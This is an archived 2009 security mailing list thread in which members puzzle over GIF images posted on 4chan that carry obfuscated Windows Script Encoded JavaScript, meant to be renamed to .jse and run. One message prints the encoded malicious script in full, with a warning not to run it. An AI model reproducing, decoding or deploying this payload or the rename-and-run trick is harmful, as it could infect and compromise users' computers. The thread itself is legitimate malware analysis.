Obfuscated Javascript in a JSE in an Image

[pj_mcgarvey at hotmail.com (PJ McGarvey)]

I'm not sure it operates the same way as other javascript obfuscation I've seen, where the obfuscation is preceded by a 
<script> tag or some other programmatic technique, followed by the obfuscated code.  It sounds like it's Windows Script 
Encoded, but needs a decoder built-in to the browser to decode it.
 
What I'm confused about is, why was this image posted with instructions to rename and run it?  Does the poster of the 
image really expect people to do that?  Was he just sharing his malware with others on the board?  I'm assuming that 
b/c it was originally posted as a .gif that any browser would not attempt to decode and run it.  Though AV might pick 
it up - not sure.   I've seen AV pick up GIF images with <script> tags embedded at the end linking to malicious .js 
files.
 Issue 3/2008 of Hakin9 has a good writeup on Javascript obfuscation by the way. -PJ



Date: Wed, 11 Feb 2009 19:57:26 -0500From: irongeek at irongeek.comTo: pauldotcom at mail.pauldotcom.comSubject: Re: 
[Pauldotcom] Obfuscated Javascript in a JSE in an ImageThanks, someone else mentioned ISC's post as well, but it seems 
to lack detail on what obfuscation system is being used.Adrian
2009/2/11 Alvaro <alvaro.picapau at gmail.com>
Just in case you are still interested, I read the following in the 
ISC:http://isc.sans.org/diary.html?storyid=5821&rssRegards,Alvaro
2009/2/8 Adrian Crenshaw <irongeek at irongeek.com> 



Thanks, that helps, but I'd love to know what they used to obfuscate this. I've seen a few schemes for obfuscate 
Javascript, and this one is the fugliest I've encountered. I don't even understand how it can run. 



On Sun, Feb 8, 2009 at 1:23 AM, Tim Mugherini <gbugbear at gmail.com> wrote:
AdrianDshield posted about this todayMay want to check in with them


On 2/7/09, Adrian Crenshaw <irongeek at irongeek.com> wrote:> Ok, I found these images on 4chan that have encoded 
javascript in them, you> have to safe the gif as a jse to run them (but don't!!!, I'm just uploading> the images to a 
forum so you can see what they are). Exactly how is this> encoded, and can anyone tell what it does? This seems to be 
the script part:>> GIF89aI    =    "x1!??";> #@~^pwkAAA==-mD~XtMP',x APzmOk7+p6(L+1O`rH/Xhs c(tSuKPKr#I@> #@&-lMPd4 
VV~x,xnh,)1Yr7+or4N+1O`r jmMk2Oc?t sVr#i@#@&-lMP6/GPx~> +APz^Yb\np}4Ln^D`E?1.bwObxTRsbV jXkYn:}4%n1YJ*I@> 
#@&\lM~r+,',xnh~)1Yr\ pr(Ln^D`J(UD+.x> OA62^WM+Dcba2VbmCYbWUE*i@#@&@#@&r?Ji@#@&dt V^R^E.. xOfb.+1YG.HP'~WkW> o 
OUwn1kmVsKV9nDv bi@#@&d4 VVc.E    `J1h[PJm,mGwz~'JEP3~ UC> 
d1Dk2OwEsVgCs+~3Pr-J,/HdRN/nJ*i@#@&DDX,`@#@&J?Jp@#@&P,P,/4+sscDnoq.kD+cE_|Ziw'?G0DAmDn'-tkmMWkG0D-w> bx[GS/-'/EMD+> 
O#+M/bWU-w]!xw-kz/N/nEBPJAd1DrwD~J4~rP3P0kWcL+D?2+1kCswWV9nDv> #,Q~J'-kXdR%d Jbi@#@&8,mCO1t`nb,    N@#@&@#@&h4bV 
`F*PP~YMX~> @#@&@#@&,PP,atMRWanU`ro YE~~E4YOw=&zb:L> WmtCUcW.oJ8JJS,!*i@#@&J?rI@#@&P~P,64.c/+D]+$E+kOu+mN DcJ(W> HGNbWk 
NRjbxmnEBPU+S~GlO `Z##p@#@&~P,PatMRdn    N`*I@> #@&PP,~-lMPalL+~x,64Dc.+kwGUk+KnaDi@#@&@#@&,P~,YMXPP@> 
#@&~P,P~P,Pa4MRWanxvJo> OE~,wmonRhCDm4`J@!l,t.n6'Jc4DY2)'&'zrso'Rc1tmU-cW.o'z8wJ/D1wz'N_'> 
Rc#J#,FDS,!bi@#@&J?ri@#@&,PP~~,P~64.c/n    Nv#i@#@&,~P,P~P,\C.,k:,xP> +h,)^Yb\ (64%n1YcJz[W94 
jDD+Chr#I@#@&~,P~,P,PksRsGN PxP2i@#@&,PP,~P,Pks> OXa+,'~FI@#@&P~P,~P,PrhcWwnUv#I@#@&~,P~,P,PksRS.kD+c64D> . /wKU/ 
AW9zbi@#@&,P~P~~,Pr:cdl7+PGwkVncrL> Lknr~~y#p@#@&r?Jp@#@&,P~P,P~~kt+^sRMExvEA/1DbwOP&8,L> LknJ*i@#@&,PP~N,mCY14v+b,> 
)@#@&@#@&,~P,\CD,4[.HP',cJr_HmO4RMl> NG:cb*RdE(dYM`+bp@#@&~~,P-lM~4+C9P{PJ'D'UO> J~_,4[.HP_,E-M-x;GUY 
xDO9kd2K/rYbGx=PWGM:O[CDlIP    Cs+xri@> #@&@#@&P,~P7l.Pal.O8P',W/KRWanUK> 6DsrVncrXE~,+~,FbI@#@&J?EI@#@&~P,~al.DFchDbY 
ct l[P3PE. /YKwD'x-MwUJ,_,wCon> slOm4cz@!/2C    Pk[xrxGY4. l[v-9_#J#]qT,_~t l[~3PJ!20bV+p~Wk^+> lh+xCcor0'.-    -.w    
J#I@#@&P~P,2mDO8R1VWk+vbi@#@&@#@&,P~~7lD,2lMY> ,x~0kWcW2+UP 6Osbs+vJ"EBP S~8#I@#@&E?ri@#@&P,PPalMO> 
ch.kD+ccrJ_tCY4RDmU[Ws`*# /;8kY.`ybP3P4nmNPQ~r:GN wM-U'D'xD obdY'Dwx> OE~3P49.X,_PrRR-M-    Jbi@#@&,P~PaCDD  ^^W/nc*i@> 
#@&@#@&,P~,/4+V^RM;xvJ^:9P&^,mWazPJ4PHQdXkRN/n_"~aJSPZSP8#I@#@&@#@&~~,P-lM~aWdDP{Px> h,)mDk-+or8% mYvEb9WN(> 
jYM+m:E#I@#@&J?Ei@#@&P,P~2K/Y hKNnP{~2i@#@&P,PPaWkORDX2+,'~qp@#@&,~P,wWkO> Wa+    `bi@#@&,P~PaG/DRsGmNs.GssrV> 
crwE*i@#@&@#@&P,~PDDzPP@#@&~,PP,~P,k+cUC\bomYn`E4DY2)J&kso> *1tlU KDLz(&r#I@#@&,PP,P,~P9W~    @#@&~~,PP,~P,PP,    
jCc/^+nwcqZ!bi@> #@&J?ri@#@&,PP~~,P~8,A4ks Pvk+cD CNH?OlD+~Z{Pc*I@#@&PP,~~P,Pb+ /OGa`bi@> #@&P,P~~,PPrncNGm!h> 
xOcmKW3b+,xPrxA/|/Oz^+'p~+XwkMnd'rP3PU+A~GlO+vT#,_~EpPwCO4'&i,[K:Cbx{Rc1tmURKDLJp@#@&~,PP)~mmYm4cn#,> 
)@#@&@#@&E?ri@#@&,~P,64.cWwnUvJ2WkOr~~rtDYw=zJ[lDR*m4lU> KDoJ8zb:o(GCD9Rat2JS~Z#I@#@&~P,Pa4MR/nO"+5E dDCnmN D`rZKUY> 
xOO:X2nr~PrhE^YkaC.YJ0KDhO[CDlIP(GE> NC.H'J~Q,4[DHbp@#@&,P,P64Dcd+    NcwK/Obp@#@&@#@&P,PPqjuRkV +2`XTZ!T#p@> 
#@&@#@&N~1lY^4v+bPPN,8@#@&VKACAA==^#~@>> If you wan to see the gifs in question, look at this post:>> 
http://www.binrev.com/forums/index.php?showtopic=40285&hl=>>> Adrian>--Sent from my mobile 
device_______________________________________________Pauldotcom mailing listPauldotcom at 
mail.pauldotcom.comhttp://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcomMain Web Site: 
http://pauldotcom.com_______________________________________________Pauldotcom mailing listPauldotcom at 
mail.pauldotcom.comhttp://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcomMain Web Site: 
http://pauldotcom.com_______________________________________________Pauldotcom mailing listPauldotcom at 
mail.pauldotcom.comhttp://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcomMain Web Site: http://pauldotcom.com
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://mail.pauldotcom.com/pipermail/pauldotcom/attachments/20090212/da48b029/attachment.htm